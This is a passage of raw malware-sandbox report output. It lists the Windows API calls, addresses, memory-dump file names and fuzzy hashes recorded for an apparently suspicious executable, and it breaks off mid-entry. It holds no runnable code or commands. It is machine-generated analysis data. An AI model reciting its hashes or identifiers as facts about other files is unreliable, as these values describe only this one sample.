                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00788C5F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                • String ID:
                                                                • API String ID: 2832842796-0
                                                                • Opcode ID: 49573867ce15f762314832919587e59928718e0e63a931be11c132400b93aa46
                                                                • Instruction ID: bff4806f86c215d9bcee4551e6ff29b6d857176a3fef565e5111fb3c63802d5c
                                                                • Opcode Fuzzy Hash: 49573867ce15f762314832919587e59928718e0e63a931be11c132400b93aa46
                                                                • Instruction Fuzzy Hash: DC514F35A00215DFCB05DF64C885AADBBF5FF49314F088498E849AB3A2DB39ED51CB91
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00798F40
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00798FD0
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00798FEC
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00799032
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00799052
                                                                  • Part of subcall function 0072F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00781043,?,7529E610), ref: 0072F6E6
                                                                  • Part of subcall function 0072F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0076FA64,00000000,00000000,?,?,00781043,?,7529E610,?,0076FA64), ref: 0072F70D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                • String ID:
                                                                • API String ID: 666041331-0
                                                                • Opcode ID: b9faf10cb567af433e52fa7075164347c1f9d944238f51e69bba29c1953d8d7c
                                                                • Instruction ID: 339826e85688129c538e467c16645cff0f6d0e30de08766ad04096fb614b8c0a
                                                                • Opcode Fuzzy Hash: b9faf10cb567af433e52fa7075164347c1f9d944238f51e69bba29c1953d8d7c
                                                                • Instruction Fuzzy Hash: 96514E34600205DFCB15DF58D4948ADBBF1FF49314F048098E9169B362DB39ED86CB91
                                                                APIs
                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 007A6C33
                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 007A6C4A
                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007A6C73
                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0078AB79,00000000,00000000), ref: 007A6C98
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007A6CC7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$MessageSendShow
                                                                • String ID:
                                                                • API String ID: 3688381893-0
                                                                • Opcode ID: 4c862896f41cc54575a4fa83c556583b2dd16c6dc232d309c07840ad5ec9d601
                                                                • Instruction ID: c0be182e6a40188d8e4e1ed69b16c75ad4722fea236826e68eba213fe2c273ef
                                                                • Opcode Fuzzy Hash: 4c862896f41cc54575a4fa83c556583b2dd16c6dc232d309c07840ad5ec9d601
                                                                • Instruction Fuzzy Hash: CB41D075A04104BFD724DF28CC48BA97BA5EB8B360F194368F895A72E0C779FD40CA60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 86cf9ff042edd9f604c5850ddd51545892b163ed8fb6afd9b470b5ad46c0d257
                                                                • Instruction ID: 3b48ed716823fd4e606d038a901500b35ad9d5e1343c2768ac84ff8c96579d86
                                                                • Opcode Fuzzy Hash: 86cf9ff042edd9f604c5850ddd51545892b163ed8fb6afd9b470b5ad46c0d257
                                                                • Instruction Fuzzy Hash: 1F41D032A002049FDB24DF78C884A5EB7F5EF88310F5545A9F515EB366EB35AD12CB90
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 00729141
                                                                • ScreenToClient.USER32(00000000,?), ref: 0072915E
                                                                • GetAsyncKeyState.USER32(00000001), ref: 00729183
                                                                • GetAsyncKeyState.USER32(00000002), ref: 0072919D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AsyncState$ClientCursorScreen
                                                                • String ID:
                                                                • API String ID: 4210589936-0
                                                                • Opcode ID: 3edae845eba0d86161f8a8d5346c829583dcf285b05d98644f4fe9b78ab5f293
                                                                • Instruction ID: 4fd9bdfbef24dca1c04dd6c64decf63aa1d9b56ee86c598a2c5c0af66cadec31
                                                                • Opcode Fuzzy Hash: 3edae845eba0d86161f8a8d5346c829583dcf285b05d98644f4fe9b78ab5f293
                                                                • Instruction Fuzzy Hash: 3C41903190821AFBDF099F68D848BEEB774FB46364F248216E925A32D0C7385D50CBA1
                                                                APIs
                                                                • GetInputState.USER32 ref: 007838CB
                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00783922
                                                                • TranslateMessage.USER32(?), ref: 0078394B
                                                                • DispatchMessageW.USER32(?), ref: 00783955
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00783966
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                • String ID:
                                                                • API String ID: 2256411358-0
                                                                • Opcode ID: 1492f31529dd2e0a7a185aa7bc2c38d7ab5255fed3bf59a395305264b986ecf1
                                                                • Instruction ID: 556d7e165740bce44474434c1befb76762fd4cd6deb36cde88f95bcb1bd9135a
                                                                • Opcode Fuzzy Hash: 1492f31529dd2e0a7a185aa7bc2c38d7ab5255fed3bf59a395305264b986ecf1
                                                                • Instruction Fuzzy Hash: B4311A709853819EEB35EB3CD849FB637A8EB05708F44456DE466C60A0E3FCB685CB21
                                                                APIs
                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CF38
                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 0078CF6F
                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFB4
                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFC8
                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0078C21E,00000000), ref: 0078CFF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                • String ID:
                                                                • API String ID: 3191363074-0
                                                                • Opcode ID: 157a030967e744a7ea54b4c8a2b3de7d44931837db61e1485a025e26675ddbd3
                                                                • Instruction ID: 02da19631f17b63c90bd373601da9104c8f9727fdff3ca8cba969361f966149d
                                                                • Opcode Fuzzy Hash: 157a030967e744a7ea54b4c8a2b3de7d44931837db61e1485a025e26675ddbd3
                                                                • Instruction Fuzzy Hash: C5315472544205FFEB21EFA5D88496B77F9EB55354B10842EF606D2140DB38AD41DB60
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 00771915
                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 007719C1
                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 007719C9
                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 007719DA
                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007719E2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleep$RectWindow
                                                                • String ID:
                                                                • API String ID: 3382505437-0
                                                                • Opcode ID: 6da31fa6fad30290b62d42899acc5cc9f96620f3ee2101bd0e80ddef42215b60
                                                                • Instruction ID: d69031b206f0d91c3cfd301de69af99910b1bda47eed75242d0c15a50dd6f1bd
                                                                • Opcode Fuzzy Hash: 6da31fa6fad30290b62d42899acc5cc9f96620f3ee2101bd0e80ddef42215b60
                                                                • Instruction Fuzzy Hash: 6831CD71A00259EFCF00CFACC999AEE3BB5EB45314F008229FA25A72D0C374A945CF90
                                                                APIs
                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007A5745
                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007A579D
                                                                • _wcslen.LIBCMT ref: 007A57AF
                                                                • _wcslen.LIBCMT ref: 007A57BA
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007A5816
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$_wcslen
                                                                • String ID:
                                                                • API String ID: 763830540-0
                                                                • Opcode ID: 9a21b0322d220719e090b0822fe9ae3608c522dd8765abdd148ad085a2f5f7ed
                                                                • Instruction ID: 4f7bfbce01983ce7c2ed400ca59cd53d69f10829eca10364f2430cc91933e510
                                                                • Opcode Fuzzy Hash: 9a21b0322d220719e090b0822fe9ae3608c522dd8765abdd148ad085a2f5f7ed
                                                                • Instruction Fuzzy Hash: F721A271904618EADB208FA0CC85EEE77B8FF86320F108356F929EA181D7789985CF50
                                                                APIs
                                                                • IsWindow.USER32(00000000), ref: 00790951
                                                                • GetForegroundWindow.USER32 ref: 00790968
                                                                • GetDC.USER32(00000000), ref: 007909A4
                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007909B0
                                                                • ReleaseDC.USER32(00000000,00000003), ref: 007909E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ForegroundPixelRelease
                                                                • String ID:
                                                                • API String ID: 4156661090-0
                                                                • Opcode ID: c4c3b1ddd2a95e287abccbe46cb13899b3a724d823d79cc7bf28d7106dc22720
                                                                • Instruction ID: 131e460efd0d28d2715b1df3b19fc8066e71a0825e77e9c532e8d06317d211f9
                                                                • Opcode Fuzzy Hash: c4c3b1ddd2a95e287abccbe46cb13899b3a724d823d79cc7bf28d7106dc22720
                                                                • Instruction Fuzzy Hash: FA219675600204EFD704EF69D948AAEB7F9EF49710F048468F84AD7352DB38AC44CB90
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0074CDC6
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074CDE9
                                                                  • Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0074CE0F
                                                                • _free.LIBCMT ref: 0074CE22
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0074CE31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: cb267e277d34f1bf080a79e21e6cf5ac0f8b93590842f258660448138e145642
                                                                • Instruction ID: e10bb750703c34dfcff45397270a766a4ba95066399be75725b5e040f3b825f5
                                                                • Opcode Fuzzy Hash: cb267e277d34f1bf080a79e21e6cf5ac0f8b93590842f258660448138e145642
                                                                • Instruction Fuzzy Hash: 7101D4726032257F276316B66C8CC7B696DDEC7BA1315412DF905C7201EF798D0291B4
                                                                APIs
                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
                                                                • SelectObject.GDI32(?,00000000), ref: 007296A2
                                                                • BeginPath.GDI32(?), ref: 007296B9
                                                                • SelectObject.GDI32(?,00000000), ref: 007296E2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 7d7a1ac49c91bde26a6adce58121af3b5eb4251f053cdd4932342651be3958d9
                                                                • Instruction ID: 0016f455f1bde8896828d5d2e82a7c2917cf1b63f0ea1c13ab0cb60bd240d9ed
                                                                • Opcode Fuzzy Hash: 7d7a1ac49c91bde26a6adce58121af3b5eb4251f053cdd4932342651be3958d9
                                                                • Instruction Fuzzy Hash: 6521C5708033D5EFDB118F24EC49BA93BB4BB45355F548215F510AA1B1D37C6881CF98
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: 8edd2fa962bebb852ec6cc38a95820d4f66c201fe34b2c4dd394376aa1720395
                                                                • Instruction ID: 920d362e614cb3e5c73ac44085ac043bb25794722ae00f593bc49645bb721e0c
                                                                • Opcode Fuzzy Hash: 8edd2fa962bebb852ec6cc38a95820d4f66c201fe34b2c4dd394376aa1720395
                                                                • Instruction Fuzzy Hash: F60175E1641A09FBEA0C57219D86FBB735D9B613E5F408121FD0C9A642F7ADED1082F1
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0073F2DE,00743863,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6), ref: 00742DFD
                                                                • _free.LIBCMT ref: 00742E32
                                                                • _free.LIBCMT ref: 00742E59
                                                                • SetLastError.KERNEL32(00000000,00711129), ref: 00742E66
                                                                • SetLastError.KERNEL32(00000000,00711129), ref: 00742E6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free
                                                                • String ID:
                                                                • API String ID: 3170660625-0
                                                                • Opcode ID: 671eb169bc0c2ebc2b2c6be1c3ee23ebc2717b3a1e87efc6cb9ebf9bf8763ed6
                                                                • Instruction ID: ed432084d1bab747334970ff3bc0e11594b2926819d681a801268feadd53f509
                                                                • Opcode Fuzzy Hash: 671eb169bc0c2ebc2b2c6be1c3ee23ebc2717b3a1e87efc6cb9ebf9bf8763ed6
                                                                • Instruction Fuzzy Hash: D301F972245621B7C61367356C4ED2B2669ABD27A17E44025F415E2193EF7CCC238524
                                                                APIs
                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?,?,0077035E), ref: 0077002B
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770046
                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770054
                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?), ref: 00770064
                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770070
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                • String ID:
                                                                • API String ID: 3897988419-0
                                                                • Opcode ID: dd31c680bb045cad86d64b370ac17d5d07ac5078c5ebf59bf3010a2992dabfcf
                                                                • Instruction ID: b3318dddae2431434e652a5ab01647363c06d195fc24c13972a82f311b94fc67
                                                                • Opcode Fuzzy Hash: dd31c680bb045cad86d64b370ac17d5d07ac5078c5ebf59bf3010a2992dabfcf
                                                                • Instruction Fuzzy Hash: 78014B76600214FFDF124F69DC48BAA7AEDEB847A2F148124F909D6210EB7DDD40DBA0
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0077E997
                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0077E9A5
                                                                • Sleep.KERNEL32(00000000), ref: 0077E9AD
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0077E9B7
                                                                • Sleep.KERNEL32 ref: 0077E9F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                • String ID:
                                                                • API String ID: 2833360925-0
                                                                • Opcode ID: f37bc50a9af1c14a8d96d98e4729224c201ec0c4984f05155e304159a0187bdd
                                                                • Instruction ID: 7f645410aa6b746828b36e69e76cb40bc58745661e6931fa2dad3d19cff1b082
                                                                • Opcode Fuzzy Hash: f37bc50a9af1c14a8d96d98e4729224c201ec0c4984f05155e304159a0187bdd
                                                                • Instruction Fuzzy Hash: CE015B72D0152DEBCF009BE4D849ADDBB78BF4E301F008596E606B2241DB38A555CB66
                                                                APIs
                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
